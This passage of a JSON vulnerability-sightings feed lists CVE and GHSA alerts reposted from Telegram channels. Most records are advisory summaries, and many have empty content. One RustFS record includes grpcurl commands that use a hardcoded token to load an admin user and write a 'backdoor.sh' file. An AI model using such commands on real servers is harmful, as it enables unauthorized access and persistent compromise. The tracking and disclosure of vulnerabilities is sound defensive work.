"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-92PG-3W49-4W5X", "type": "published-proof-of-concept", "source": "Telegram/MQ6ai6F8nIsMgggTBJXuPSpPwam_g57gd_s1UAnW3xco8kE", "content": "", "creation_timestamp": "2026-04-02T17:38:06.000000Z"}, {"uuid": "72347320-14a0-4f04-80d0-e9beb1087b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3X2W-63FP-3QVW", "type": "published-proof-of-concept", "source": "Telegram/84MSU-hIhNrWnS8A8cOqhlUxSHC6aqIIGr26pihaT5cA3PI", "content": "", "creation_timestamp": "2026-03-31T05:17:29.000000Z"}, {"uuid": "32249dec-462c-47bf-ba3c-be113a981fe5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RH5M-2482-966C", "type": "published-proof-of-concept", "source": "Telegram/84MSU-hIhNrWnS8A8cOqhlUxSHC6aqIIGr26pihaT5cA3PI", "content": "", "creation_timestamp": "2026-03-31T05:17:29.000000Z"}, {"uuid": "7645fecc-88dc-4b13-b4bd-053cd8481aa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2V2W-8V8C-WCM9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11998", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52281\n\ud83d\udd25 CVSS Score: 8.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L)\n\ud83d\udd39 Description: A: Improper Neutralization of Input During Web Page Generation vulnerability in SUSE rancher allows a malicious actor to perform a Stored XSS attack through the cluster description field.\nThis issue affects rancher: from 2.9.0 before 2.9.4.\n\ud83d\udccf Published: 2025-04-16T08:31:11.378Z\n\ud83d\udccf Modified: 2025-04-16T08:31:11.378Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2024-52281\n2. https://github.com/rancher/rancher/security/advisories/GHSA-2v2w-8v8c-wcm9", "creation_timestamp": "2025-04-16T08:55:57.000000Z"}, {"uuid": "b47ab871-98a6-4513-96c6-44df4467ab1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3798", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "4ee63df5-f0d1-42d9-be2e-4f418a95f1c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8W3P-QH3X-6GJR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12750", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23504\n\ud83d\udd25 CVSS Score: 5.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:L)\n\ud83d\udd39 Description: TYPO3 is an open source PHP based web content management system. Versions prior to 9.5.38, 10.4.33, 11.5.20, and 12.1.1 are subject to Sensitive Information Disclosure. Due to the lack of handling user-submitted YAML placeholder expressions in the site configuration backend module, attackers could expose sensitive internal information, such as system configuration or HTTP request messages of other website visitors. A valid backend user account having administrator privileges is needed to exploit this vulnerability. This issue has been patched in versions 9.5.38 ELTS, 10.4.33, 11.5.20, 12.1.1.\n\ud83d\udccf Published: 2022-12-14T07:58:05.232Z\n\ud83d\udccf Modified: 2025-04-21T19:21:19.354Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-8w3p-qh3x-6gjr", "creation_timestamp": "2025-04-21T20:03:22.000000Z"}, {"uuid": "51cc01b9-ecef-420b-9c5e-7cfbc01f4eb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3X5-7C4C-66P9", "type": "seen", "source": "Telegram/3f3-cwfXIykKmhboQeDZ-9JfvsVfmMtyX9y0DYWKgM6OqHA", "content": "", "creation_timestamp": "2026-01-02T18:52:46.000000Z"}, {"uuid": "567c9036-518a-4368-a081-fb8c3ee05ef1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CG4F-CQ8H-3CH8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13884", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46350\n\ud83d\udd25 CVSS Score: 3.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: YesWiki is a wiki system written in PHP. Prior to version 4.5.4, an attacker can use a reflected cross-site scripting attack to steal cookies from an authenticated user by having them click on a malicious link. Stolen cookies allow the attacker to take over the user\u2019s session. This vulnerability may also allow attackers to deface the website or embed malicious content. This issue has been patched in version 4.5.4.\n\ud83d\udccf Published: 2025-04-29T17:11:18.291Z\n\ud83d\udccf Modified: 2025-04-29T18:00:34.649Z\n\ud83d\udd17 References:\n1. https://github.com/YesWiki/yeswiki/security/advisories/GHSA-cg4f-cq8h-3ch8\n2. https://github.com/YesWiki/yeswiki/commit/e2603176a4607b83659635a0c517550d4a171cb9", "creation_timestamp": "2025-04-29T18:12:21.000000Z"}, {"uuid": "51006d45-d586-4567-8ebd-25a2aefe2d63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PJR6-JX7R-J4R6", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13926", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46344\n\ud83d\udd25 CVSS Score: 4.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. Versions starting from 4.0.1 and prior to 4.5.1, do not invoke `.setExpirationTime` when generating a JWE token for the session. As a result, the JWE does not contain an internal expiration claim. While the session cookie may expire or be cleared, the JWE remains valid. This issue has been patched in version 4.5.1.\n\ud83d\udccf Published: 2025-04-29T20:43:41.538Z\n\ud83d\udccf Modified: 2025-04-29T20:43:41.538Z\n\ud83d\udd17 References:\n1. https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-pjr6-jx7r-j4r6\n2. https://github.com/auth0/nextjs-auth0/commit/a4f061aed02ffa132feca8adfbd11704df17e1c3\n3. https://github.com/auth0/nextjs-auth0/releases/tag/v4.5.1", "creation_timestamp": "2025-04-29T21:13:27.000000Z"}, {"uuid": "c9e1cacd-424d-4ebe-90b2-f686c9b2af9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4R83-8F94-HRPH", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1215", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33186\n\ud83d\udd39 Description: Zulip is an open-source team collaboration tool with unique topic-based threading that combines the best of email and chat to make remote work productive and delightful. The main development branch of Zulip Server from May 2, 2023 and later, including beta versions 7.0-beta1 and 7.0-beta2, is vulnerable to a cross-site scripting vulnerability in tooltips on the message feed. An attacker who can send messages could maliciously craft a topic for the message, such that a victim who hovers the tooltip for that topic in their message feed triggers execution of JavaScript code controlled by the attacker.\n\ud83d\udccf Published: 2023-05-30T05:31:37.279Z\n\ud83d\udccf Modified: 2025-01-10T19:47:40.529Z\n\ud83d\udd17 References:\n1. https://github.com/zulip/zulip/security/advisories/GHSA-4r83-8f94-hrph\n2. https://github.com/zulip/zulip/pull/25370\n3. https://github.com/zulip/zulip/commit/03cfb3d9fe61c975d133121ec31a7357f0c9e18f\n4. https://github.com/zulip/zulip/commit/3ca131743b00f42bad8edbac4ef92656d954c629", "creation_timestamp": "2025-01-10T20:07:11.000000Z"}, {"uuid": "aaadf8e2-54f7-473f-a7b8-202deec0a01c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VP3X-9QPG-Q385", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/99", "content": "\ud83d\udccc **CVE ID**: GHSA-vp3x-9qpg-q385\n\ud83d\udd17 **Aliases**: CVE-2024-41766\n\ud83d\udd39 **Details**: IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3  could allow a remote attacker to cause a denial of service using a complex regular expression.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-1333\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-4166\n2. https://www.ibm.com/support/pages/node/180203", "creation_timestamp": "2025-01-05T01:38:11.000000Z"}, {"uuid": "dda2be41-fe1f-46ed-aa22-7b9ac48fe354", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99Q4-QXP3-PJPM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/82", "content": "\ud83d\udccc **CVE ID**: GHSA-99q4-qxp3-pjpm\n\ud83d\udd17 **Aliases**: CVE-2025-0207\n\ud83d\udd39 **Details**: A vulnerability, which was classified as critical, has been found in code-projects Online Shoe Store 1.0. Affected by this issue is some unknown functionality of the file /function/login.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-74\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-020\n2. https://code-projects.org\n3. https://gist.github.com/th4s1s/d10dfaebae5c8dbe54ad83d6325d81\n4. https://vuldb.com/?ctiid.290144\n5. https://vuldb.com/?id.290144\n6. https://vuldb.com/?submit.44035", "creation_timestamp": "2025-01-05T01:35:54.000000Z"}, {"uuid": "559c21ee-85f0-401b-820c-b4912ba46aeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R5J8-58V3-G23G", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/79", "content": "\ud83d\udccc **CVE ID**: GHSA-r5j8-58v3-g23g\n\ud83d\udd17 **Aliases**: CVE-2024-41768\n\ud83d\udd39 **Details**: IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3 could allow a remote attacker to cause an unhandled SSL exception which could leave the connection in an unexpected or insecure state.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-544\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-4168\n2. https://www.ibm.com/support/pages/node/180202", "creation_timestamp": "2025-01-05T01:35:35.000000Z"}, {"uuid": "3d6edfe0-cea2-472c-aa90-95c221cae3e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QCG2-98H8-485J", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/166", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-qcg2-98h8-485j\n\ud83d\udd17 Aliases: CVE-2024-8474\n\ud83d\udd39 Details: OpenVPN Connect before version 3.5.0 can contain the configuration profile's clear-text private key which is logged in the application log, which an unauthorized actor can use to decrypt the VPN traffic\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:31:00Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T15:31:00Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-212\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-844\n2. https://openvpn.net/connect-docs/android-release-notes.html", "creation_timestamp": "2025-01-06T15:36:33.000000Z"}, {"uuid": "13a9024d-8b59-4376-a410-345031515bd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H956-RH7X-PPGJ", "type": "published-proof-of-concept", "source": "https://t.me/tech_b0lt_Genona/6017", "content": "\u0412 \u043f\u0440\u043e\u0435\u043a\u0442\u0435 RustFS, \u0440\u0430\u0437\u0432\u0438\u0432\u0430\u044e\u0449\u0435\u043c \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u0438\u043c\u043e\u0435 \u0441 S3 \u0440\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u043e\u0435 \u043e\u0431\u044a\u0435\u043a\u0442\u043d\u043e\u0435 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u0435 \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 Rust, \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2025-68926), \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u044e\u0449\u0430\u044f \u0431\u044d\u043a\u0434\u043e\u0440. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435\u043c \u0436\u0451\u0441\u0442\u043a\u043e \u043f\u0440\u043e\u0448\u0438\u0442\u043e\u0433\u043e \u0432 \u043a\u043e\u0434\u0435 \u0442\u043e\u043a\u0435\u043d\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043a \u0441\u0435\u0442\u0435\u0432\u043e\u043c\u0443 \u0441\u0435\u0440\u0432\u0438\u0441\u0443 \u043f\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0443 gRPC, \u0443\u043a\u0430\u0437\u0430\u0432 \u0432 \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u0435 \"authorization\" \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \"rustfs rpc\". \u0422\u043e\u043a\u0435\u043d \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u043b \u0432 \u043a\u043e\u0434\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u0430. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (9.8 \u0438\u0437 10).\n\n\u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439, \u0438\u043c\u0435\u044e\u0449\u0438\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0435\u0442\u0435\u0432\u043e\u043c\u0443 \u043f\u043e\u0440\u0442\u0443 gRPC, \u043c\u043e\u0433 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u0442\u043e\u043a\u0435\u043d \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u0441 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435\u043c, \u0441\u0440\u0435\u0434\u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0445, \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0438 \u0441 \u0443\u0447\u0451\u0442\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0430. \u041f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e RustFS \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 gRPC-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043d\u0430 TCP-\u043f\u043e\u0440\u0442\u0443 9000 \u043d\u0430 \u0432\u0441\u0435\u0445 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430\u0445. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u0432\u044b\u043f\u0443\u0441\u043a\u0435 RustFS 1.0.0-alpha.77.\n\n   grpcurl -plaintext -H 'authorization: rustfs rpc' \\\n     -d '{\"access_key\": \"admin\"}' \\\n     localhost:9000 node_service.NodeService/LoadUser\n   grpcurl -plaintext -H 'authorization: rustfs rpc' \\\n     -d '{\"volume\": \"config\", \"path\": \"backdoor.sh\", \"buf\": \"...\"}' \\\n     localhost:9000 node_service.NodeService/WriteAll\n\n\u0412 RustFS \u0432\u044b\u044f\u0432\u043b\u0435\u043d \u043f\u0440\u0435\u0434\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0439 \u0432 \u043a\u043e\u0434\u0435 \u0442\u043e\u043a\u0435\u043d \u0434\u043e\u0441\u0442\u0443\u043f\u0430\nhttps://www.opennet.ru/opennews/art.shtml?num=64551\n\n\u041e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\ngRPC Hardcoded Token Authentication Bypass - Reproduction Report\nhttps://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj", "creation_timestamp": "2026-01-03T21:49:18.000000Z"}, {"uuid": "094bf714-3527-4699-a5c7-1ea7887c7096", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VCP4-P2MP-8FPQ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/56", "content": "\ud83d\udccc **CVE ID**: GHSA-vcp4-p2mp-8fpq\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1095\n2. https://plugins.trac.wordpress.org/browser/updraftplus/trunk/includes/class-search-replace.php#L411\n3. https://plugins.trac.wordpress.org/changeset/3212299\n4. https://www.wordfence.com/threat-intel/vulnerabilities/id/429ed3-96b2-41-8a2-89b9a21ec058?source=cve", "creation_timestamp": "2025-01-05T01:32:48.000000Z"}, {"uuid": "6f440dc2-27f9-4d72-bb73-a7b5ad869d38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VP3X-9QPG-Q385", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/55", "content": "\ud83d\udccc **CVE ID**: GHSA-vp3x-9qpg-q385\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-4166\n2. https://www.ibm.com/support/pages/node/180203", "creation_timestamp": "2025-01-05T01:32:44.000000Z"}, {"uuid": "0cbb5ed6-fc2e-486f-9cc2-8d4d63b9cfd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WV9-JQ79-5P63", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/51", "content": "\ud83d\udccc **CVE ID**: GHSA-2wv9-jq79-5p63\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0212\n2. https://github.com/shaturo133/POCs/blob/main/SQL20Injection20in20Student20Grading20System.md\n3. https://vuldb.com/?ctiid.29015\n4. https://vuldb.com/?id.29015\n5. https://vuldb.com/?submit.44168\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:32:22.000000Z"}, {"uuid": "3f53de3d-4d8a-4a5d-bf0c-1050c1cbc7d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7R9J-R86Q-7G45", "type": "published-proof-of-concept", "source": "Telegram/DJsg5Qi7j92DgCP14lqfeXU4IPClBfbIww0fpCMr4ueipk0", "content": "", "creation_timestamp": "2026-04-03T17:26:40.000000Z"}, {"uuid": "7108483a-af75-4a37-a5cb-9652d5eb4617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WFH-RCWF-WH23", "type": "published-proof-of-concept", "source": "Telegram/CfZ2Rt5oDMh5hfP6-7c66YyH_Az2lNtcnTrevEl4rY2ivCc", "content": "", "creation_timestamp": "2026-04-03T17:26:47.000000Z"}, {"uuid": "6cbfa93b-7ce2-47b4-bb63-6f839ca3dda2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GP5X-2V54-V2Q5", "type": "published-proof-of-concept", "source": "Telegram/CfZ2Rt5oDMh5hfP6-7c66YyH_Az2lNtcnTrevEl4rY2ivCc", "content": "", "creation_timestamp": "2026-04-03T17:26:47.000000Z"}, {"uuid": "58cabdff-75e1-4dc1-bfc5-c965e5dddffa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJ39-GWG7-6872", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/34", "content": "\ud83d\udccc **CVE ID**: GHSA-vj39-gwg7-6872\n\ud83d\udd39 **Summary**: No summary available.\n\ud83d\udd22 **CVSS Score**: N/A\n\ud83d\udd25 **Impact/Severity**: N/A\n\ud83c\udff7\ufe0f **CWE ID**: N/A\n\ud83d\uddd3\ufe0f **Published**: N/A\n\ud83d\udee0\ufe0f **Vendor/Product**: N/A/N/A\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0214\n2. https://gist.github.com/mcdruid/ff4f29f4e7830e9e91988c7195d77039\n3. https://vuldb.com/?ctiid.290159\n4. https://vuldb.com/?id.290159\n5. https://vuldb.com/?submit.474299", "creation_timestamp": "2025-01-05T01:30:21.000000Z"}, {"uuid": "d45c14df-d431-4769-97ff-0d309327f8eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7R95-6MR9-6F86", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/33", "content": "\ud83d\udccc CVE ID: GHSA-7r95-6mr9-6f86\n\ud83d\udd39 Summary: No summary available.\n\ud83d\udd17 More Info: https://nvd.nist.gov/vuln/detail/CVE-2024-1245", "creation_timestamp": "2025-01-05T01:28:46.000000Z"}, {"uuid": "8b1a3e5b-3aa2-4b0a-a293-151975569cb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5CHH-WV34-P78R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/64", "content": "\ud83d\udccc **CVE ID**: GHSA-5chh-wv34-p78r\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0211\n2. https://github.com/shaturo133/POCs/blob/main/LFI20in20School20Faculty20Scheduling20System.md\n3. https://vuldb.com/?ctiid.290156\n4. https://vuldb.com/?id.290156\n5. https://vuldb.com/?submit.44115\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:33:31.000000Z"}, {"uuid": "7d2da7af-1dfe-4de1-aa97-aad2ab0528e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7H6M-3862-6XR6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/63", "content": 